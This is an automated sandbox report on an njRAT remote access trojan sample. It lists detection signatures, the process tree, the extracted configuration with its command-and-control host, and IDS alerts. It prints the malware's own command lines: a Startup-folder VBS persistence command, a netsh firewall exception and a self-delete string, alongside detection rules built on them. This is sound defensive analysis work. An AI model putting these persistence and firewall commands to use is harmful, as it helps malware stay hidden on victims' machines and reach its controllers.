Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
iR2UtZj5vP.exe

Overview

General Information

Sample name:iR2UtZj5vP.exe
renamed because original name is a hash value
Original sample name:52b074e39e4f3ba00c230ba82eb62499.exe
Analysis ID:1386934
MD5:52b074e39e4f3ba00c230ba82eb62499
SHA1:054a51bf0c25309a728a8bc14c77262168f134a1
SHA256:4c75f91c9974d712ef96b2f6bfe99edc15f110dea80065a59e161e639d08e74d
Tags:exenjratRAT
Infos:

Detection

Njrat
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Snort IDS alert for network traffic
Yara detected Njrat
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
C2 URLs / IPs found in malware configuration
Command shell drops VBS files
Connects to many ports of the same IP (likely port scanning)
Contain functionality to detect virtual machines
Contains functionality to inject code into remote processes
Contains functionality to log keystrokes (.Net Source)
Creates autostart registry keys with suspicious names
Deletes itself after installation
Disables zone checking for all users
Drops PE files to the startup folder
Drops VBS files to the startup folder
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the windows firewall
Protects its processes via BreakOnTermination flag
Sigma detected: New RUN Key Pointing to Suspicious Folder
Tries to detect sandboxes / dynamic malware analysis system (file name check)
Uses netsh to modify the Windows network and firewall settings
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Process Patterns NTDS.DIT Exfil
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Sigma detected: Wscript Shell Run In CommandLine
Stores files to the Windows start menu directory
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • iR2UtZj5vP.exe (PID: 7976 cmdline: C:\Users\user\Desktop\iR2UtZj5vP.exe MD5: 52B074E39E4F3BA00C230BA82EB62499)
    • cmd.exe (PID: 8024 cmdline: C:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\user\Desktop\iR2UtZj5vP.exe",1: >"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 8032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • iR2UtZj5vP.exe (PID: 8100 cmdline: C:\Users\user\Desktop\iR2UtZj5vP.exe MD5: 52B074E39E4F3BA00C230BA82EB62499)
      • WindowsServices.exe (PID: 7180 cmdline: "C:\Users\user\AppData\Local\Temp\WindowsServices.exe" MD5: 52B074E39E4F3BA00C230BA82EB62499)
        • cmd.exe (PID: 7256 cmdline: C:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\user\AppData\Local\Temp\WindowsServices.exe",1: >"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WindowsServices.exe (PID: 7396 cmdline: C:\Users\user\AppData\Local\Temp\WindowsServices.exe MD5: 52B074E39E4F3BA00C230BA82EB62499)
          • netsh.exe (PID: 7968 cmdline: netsh firewall add allowedprogram "C:\Users\user\AppData\Local\Temp\WindowsServices.exe" "WindowsServices.exe" ENABLE MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
            • conhost.exe (PID: 7980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • rundll32.exe (PID: 4180 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
  • WindowsServices.exe (PID: 340 cmdline: "C:\Users\user\AppData\Local\Temp\WindowsServices.exe" .. MD5: 52B074E39E4F3BA00C230BA82EB62499)
    • cmd.exe (PID: 5664 cmdline: C:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\user\AppData\Local\Temp\WindowsServices.exe",1: >"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WindowsServices.exe (PID: 2928 cmdline: C:\Users\user\AppData\Local\Temp\WindowsServices.exe MD5: 52B074E39E4F3BA00C230BA82EB62499)
  • WindowsServices.exe (PID: 2292 cmdline: "C:\Users\user\AppData\Local\Temp\WindowsServices.exe" .. MD5: 52B074E39E4F3BA00C230BA82EB62499)
    • cmd.exe (PID: 2540 cmdline: C:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\user\AppData\Local\Temp\WindowsServices.exe",1: >"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 3284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WindowsServices.exe (PID: 2960 cmdline: C:\Users\user\AppData\Local\Temp\WindowsServices.exe MD5: 52B074E39E4F3BA00C230BA82EB62499)
  • WindowsServices.exe (PID: 2536 cmdline: "C:\Users\user\AppData\Local\Temp\WindowsServices.exe" .. MD5: 52B074E39E4F3BA00C230BA82EB62499)
    • cmd.exe (PID: 4056 cmdline: C:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\user\AppData\Local\Temp\WindowsServices.exe",1: >"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 8188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WindowsServices.exe (PID: 4520 cmdline: C:\Users\user\AppData\Local\Temp\WindowsServices.exe MD5: 52B074E39E4F3BA00C230BA82EB62499)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
NjRATRedPacket Security describes NJRat as "a remote access trojan (RAT) has capabilities to log keystrokes, access the victim's camera, steal credentials stored in browsers, open a reverse shell, upload/download files, view the victim's desktop, perform process, file, and registry manipulations, and capabilities to let the attacker update, uninstall, restart, close, disconnect the RAT and rename its campaign ID. Through the Command & Control (CnC) server software, the attacker has capabilities to create and configure the malware to spread through USB drives."It is supposedly popular with actors in the Middle East. Similar to other RATs, many leaked builders may be backdoored.
  • AQUATIC PANDA
  • Earth Lusca
  • Operation C-Major
  • The Gorgon Group
https://malpedia.caad.fkie.fraunhofer.de/details/win.njrat
{"Campaign ID": "David", "Version": "0.7d", "Install Name": "bf497657d005804b657fde8dd2d0cb46", "Install Dir": "TEMP", "Registry Value": "Software\\Microsoft\\Windows\\CurrentVersion\\Run", "Host": "0.tcp.in.ngrok.io", "Port": "19208", "Network Seprator": "Y262SUCZ4UJJ"}
SourceRuleDescriptionAuthorStrings
00000004.00000002.1423595922.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_NjratYara detected NjratJoe Security
    00000004.00000002.1423595922.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Njrat_30f3c220unknownunknown
    • 0x5567:$a1: get_Registry
    • 0x6934:$a2: SEE_MASK_NOZONECHECKS
    • 0x6744:$a3: Download ERROR
    • 0x6a6c:$a4: cmd.exe /c ping 0 -n 2 & del "
    • 0x6a0c:$a5: netsh firewall delete allowedprogram "
    00000004.00000002.1423595922.0000000000402000.00000040.00000400.00020000.00000000.sdmpnjrat1Identify njRatBrian Wallace @botnet_hunter
    • 0x6964:$a1: netsh firewall add allowedprogram
    • 0x6934:$a2: SEE_MASK_NOZONECHECKS
    • 0x6af4:$b1: [TAP]
    • 0x6a6c:$c3: cmd.exe /c ping
    00000004.00000002.1423595922.0000000000402000.00000040.00000400.00020000.00000000.sdmpNjratdetect njRAT in memoryJPCERT/CC Incident Response Group
    • 0x6934:$reg: SEE_MASK_NOZONECHECKS
    • 0x6720:$msg: Execute ERROR
    • 0x6780:$msg: Execute ERROR
    • 0x6a6c:$ping: cmd.exe /c ping 0 -n 2 & del
    00000019.00000001.1855089629.000000000040E000.00000040.00000001.00020000.00000000.sdmpJoeSecurity_NjratYara detected NjratJoe Security
      Click to see the 107 entries
      SourceRuleDescriptionAuthorStrings
      18.2.WindowsServices.exe.25c0000.2.raw.unpackJoeSecurity_NjratYara detected NjratJoe Security
        18.2.WindowsServices.exe.25c0000.2.raw.unpackWindows_Trojan_Njrat_30f3c220unknownunknown
        • 0x5767:$a1: get_Registry
        • 0x6b34:$a2: SEE_MASK_NOZONECHECKS
        • 0x6944:$a3: Download ERROR
        • 0x6c6c:$a4: cmd.exe /c ping 0 -n 2 & del "
        • 0x6c0c:$a5: netsh firewall delete allowedprogram "
        18.2.WindowsServices.exe.25c0000.2.raw.unpackCN_disclosed_20180208_cDetects malware from disclosed CN malware setFlorian Roth
        • 0x6c6c:$x1: cmd.exe /c ping 0 -n 2 & del "
        • 0x683e:$s1: winmgmts:\\.\root\SecurityCenter2
        • 0x6966:$s3: Executed As
        • 0x5fb3:$s5: Stub.exe
        • 0x6944:$s6: Download ERROR
        • 0x6800:$s8: Select * From AntiVirusProduct
        18.2.WindowsServices.exe.25c0000.2.raw.unpacknjrat1Identify njRatBrian Wallace @botnet_hunter
        • 0x6b64:$a1: netsh firewall add allowedprogram
        • 0x6b34:$a2: SEE_MASK_NOZONECHECKS
        • 0x6cf4:$b1: [TAP]
        • 0x6c6c:$c3: cmd.exe /c ping
        18.2.WindowsServices.exe.25c0000.2.raw.unpackNjratdetect njRAT in memoryJPCERT/CC Incident Response Group
        • 0x6b34:$reg: SEE_MASK_NOZONECHECKS
        • 0x6920:$msg: Execute ERROR
        • 0x6980:$msg: Execute ERROR
        • 0x6c6c:$ping: cmd.exe /c ping 0 -n 2 & del
        Click to see the 119 entries

        System Summary

        barindex
        Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: "C:\Users\user\AppData\Local\Temp\WindowsServices.exe" .., EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\WindowsServices.exe, ProcessId: 7396, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bf497657d005804b657fde8dd2d0cb46
        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\AppData\Local\Temp\WindowsServices.exe" .., EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\WindowsServices.exe, ProcessId: 7396, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bf497657d005804b657fde8dd2d0cb46
        Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\WindowsServices.exe, ProcessId: 7396, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bf497657d005804b657fde8dd2d0cb46.exe
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\AppData\Local\Temp\WindowsServices.exe" , CommandLine: "C:\Users\user\AppData\Local\Temp\WindowsServices.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\WindowsServices.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\WindowsServices.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\WindowsServices.exe, ParentCommandLine: C:\Users\user\Desktop\iR2UtZj5vP.exe, ParentImage: C:\Users\user\Desktop\iR2UtZj5vP.exe, ParentProcessId: 8100, ParentProcessName: iR2UtZj5vP.exe, ProcessCommandLine: "C:\Users\user\AppData\Local\Temp\WindowsServices.exe" , ProcessId: 7180, ProcessName: WindowsServices.exe
        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\AppData\Local\Temp\WindowsServices.exe" .., EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\WindowsServices.exe, ProcessId: 7396, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\bf497657d005804b657fde8dd2d0cb46
        Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\user\Desktop\iR2UtZj5vP.exe",1: >"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs", CommandLine: C:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\user\Desktop\iR2UtZj5vP.exe",1: >"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Users\user\Desktop\iR2UtZj5vP.exe, ParentImage: C:\Users\user\Desktop\iR2UtZj5vP.exe, ParentProcessId: 7976, ParentProcessName: iR2UtZj5vP.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\user\Desktop\iR2UtZj5vP.exe",1: >"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs", ProcessId: 8024, ProcessName: cmd.exe

        Data Obfuscation

        barindex
        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 8024, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs
        Timestamp:192.168.2.113.6.122.10749705192082033132 02/05/24-17:11:46.647234
        SID:2033132
        Source Port:49705
        Destination Port:19208
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.113.6.122.10749726192082033132 02/05/24-17:14:07.579174
        SID:2033132
        Source Port:49726
        Destination Port:19208
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.113.6.122.10749715192082033132 02/05/24-17:12:25.474260
        SID:2033132
        Source Port:49715
        Destination Port:19208
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.113.6.122.10749716192082033132 02/05/24-17:12:30.626186
        SID:2033132
        Source Port:49716
        Destination Port:19208
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.113.6.98.23249725192082033132 02/05/24-17:13:59.558134
        SID:2033132
        Source Port:49725
        Destination Port:19208
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.113.6.122.10749713192082033132 02/05/24-17:12:21.856556
        SID:2033132
        Source Port:49713
        Destination Port:19208
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.113.6.122.10749717192082033132 02/05/24-17:12:34.128286
        SID:2033132
        Source Port:49717
        Destination Port:19208
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.113.6.122.10749706192082033132 02/05/24-17:11:51.063759
        SID:2033132
        Source Port:49706
        Destination Port:19208
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.113.6.122.10749727192082033132 02/05/24-17:15:07.884925
        SID:2033132
        Source Port:49727
        Destination Port:19208
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.113.6.98.23249720192082033132 02/05/24-17:12:47.573414
        SID:2033132
        Source Port:49720
        Destination Port:19208
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.113.6.98.23249721192082033132 02/05/24-17:12:50.977611
        SID:2033132
        Source Port:49721
        Destination Port:19208
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.113.6.122.10749709192082033132 02/05/24-17:12:05.752627
        SID:2033132
        Source Port:49709
        Destination Port:19208
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.113.6.98.23249723192082033132 02/05/24-17:13:00.449419
        SID:2033132
        Source Port:49723
        Destination Port:19208
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.113.6.122.10749711192082033132 02/05/24-17:12:12.529858
        SID:2033132
        Source Port:49711
        Destination Port:19208
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.113.6.122.10749712192082033132 02/05/24-17:12:17.572819
        SID:2033132
        Source Port:49712
        Destination Port:19208
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.113.6.122.10749719192082033132 02/05/24-17:12:42.069121
        SID:2033132
        Source Port:49719
        Destination Port:19208
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.113.6.98.23249722192082033132 02/05/24-17:12:55.034301
        SID:2033132
        Source Port:49722
        Destination Port:19208
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.113.6.98.23249724192082033132 02/05/24-17:13:13.604278
        SID:2033132
        Source Port:49724
        Destination Port:19208
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.113.6.122.10749707192082033132 02/05/24-17:11:55.885933
        SID:2033132
        Source Port:49707
        Destination Port:19208
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.113.6.115.18249728192082033132 02/05/24-17:15:26.191172
        SID:2033132
        Source Port:49728
        Destination Port:19208
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.113.6.122.10749718192082033132 02/05/24-17:12:37.780074
        SID:2033132
        Source Port:49718
        Destination Port:19208
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.113.6.122.10749708192082033132 02/05/24-17:12:00.269481
        SID:2033132
        Source Port:49708
        Destination Port:19208
        Protocol:TCP
        Classtype:A Network Trojan was detected

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: iR2UtZj5vP.exeAvira: detected
        Source: 0.tcp.in.ngrok.ioAvira URL Cloud: Label: malware
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bf497657d005804b657fde8dd2d0cb46.exeAvira: detection malicious, Label: BDS/Poison.mon
        Source: 22.2.WindowsServices.exe.2150000.2.raw.unpackMalware Configuration Extractor: Njrat {"Campaign ID": "David", "Version": "0.7d", "Install Name": "bf497657d005804b657fde8dd2d0cb46", "Install Dir": "TEMP", "Registry Value": "Software\\Microsoft\\Windows\\CurrentVersion\\Run", "Host": "0.tcp.in.ngrok.io", "Port": "19208", "Network Seprator": "Y262SUCZ4UJJ"}
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bf497657d005804b657fde8dd2d0cb46.exeReversingLabs: Detection: 86%
        Source: iR2UtZj5vP.exeReversingLabs: Detection: 86%
        Source: Yara matchFile source: 18.2.WindowsServices.exe.25c0000.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.2.iR2UtZj5vP.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 18.2.WindowsServices.exe.25c0000.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 1.2.iR2UtZj5vP.exe.2160000.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 8.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.WindowsServices.exe.2150000.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 18.2.WindowsServices.exe.2590000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 25.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 5.2.WindowsServices.exe.4f0000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 21.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.1.iR2UtZj5vP.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 25.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 1.2.iR2UtZj5vP.exe.2160000.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.WindowsServices.exe.2150000.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 21.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 5.2.WindowsServices.exe.4f0000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.WindowsServices.exe.2030000.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.WindowsServices.exe.2030000.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 1.2.iR2UtZj5vP.exe.2130000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000004.00000002.1423595922.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000019.00000001.1855089629.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000001.1338787516.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000012.00000002.1747188257.00000000025C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000019.00000002.1917172495.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.1749146703.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000015.00000001.1739321784.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000001.00000002.1341895171.0000000002160000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.1429390738.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000015.00000002.1809054876.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000019.00000001.1855089629.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000019.00000002.1917172495.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000001.1338787516.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.1423595922.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000001.1426610906.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.1875231931.0000000002150000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.1749146703.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000001.1426610906.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000001.1677403153.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000015.00000001.1739321784.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000001.1677403153.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000015.00000002.1809054876.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.1684106540.0000000002030000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: iR2UtZj5vP.exe PID: 7976, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: iR2UtZj5vP.exe PID: 8100, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: WindowsServices.exe PID: 7180, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: WindowsServices.exe PID: 7396, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: WindowsServices.exe PID: 340, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: WindowsServices.exe PID: 2928, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: WindowsServices.exe PID: 2292, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: WindowsServices.exe PID: 2960, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: WindowsServices.exe PID: 2536, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: WindowsServices.exe PID: 4520, type: MEMORYSTR
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bf497657d005804b657fde8dd2d0cb46.exeJoe Sandbox ML: detected
        Source: iR2UtZj5vP.exeJoe Sandbox ML: detected
        Source: iR2UtZj5vP.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dllJump to behavior
        Source: Binary string: caspol.pdbx source: iR2UtZj5vP.exe, 00000001.00000003.1338882973.0000000000632000.00000004.00000020.00020000.00000000.sdmp, WindowsServices.exe, 00000005.00000003.1426722472.0000000000651000.00000004.00000020.00020000.00000000.sdmp, WindowsServices.exe, 0000000E.00000002.1683943094.000000000048D000.00000004.00000020.00020000.00000000.sdmp, WindowsServices.exe, 00000012.00000002.1746893356.000000000061D000.00000004.00000020.00020000.00000000.sdmp, WindowsServices.exe, 00000016.00000002.1869540964.000000000065D000.00000004.00000020.00020000.00000000.sdmp, iR2UtZj5vP.exe.1.dr, WindowsServices.exe.4.dr
        Source: Binary string: caspol.pdb source: iR2UtZj5vP.exe, 00000001.00000003.1338882973.0000000000632000.00000004.00000020.00020000.00000000.sdmp, WindowsServices.exe, 00000005.00000003.1426722472.0000000000651000.00000004.00000020.00020000.00000000.sdmp, WindowsServices.exe, 0000000E.00000002.1683943094.000000000048D000.00000004.00000020.00020000.00000000.sdmp, WindowsServices.exe, 00000012.00000002.1746893356.000000000061D000.00000004.00000020.00020000.00000000.sdmp, WindowsServices.exe, 00000016.00000002.1869540964.000000000065D000.00000004.00000020.00020000.00000000.sdmp, iR2UtZj5vP.exe.1.dr, WindowsServices.exe.4.dr

        Networking

        barindex
        Source: TrafficSnort IDS: 2033132 ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) 192.168.2.11:49705 -> 3.6.122.107:19208
        Source: TrafficSnort IDS: 2033132 ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) 192.168.2.11:49706 -> 3.6.122.107:19208
        Source: TrafficSnort IDS: 2033132 ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) 192.168.2.11:49707 -> 3.6.122.107:19208
        Source: TrafficSnort IDS: 2033132 ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) 192.168.2.11:49708 -> 3.6.122.107:19208
        Source: TrafficSnort IDS: 2033132 ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) 192.168.2.11:49709 -> 3.6.122.107:19208
        Source: TrafficSnort IDS: 2033132 ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) 192.168.2.11:49711 -> 3.6.122.107:19208
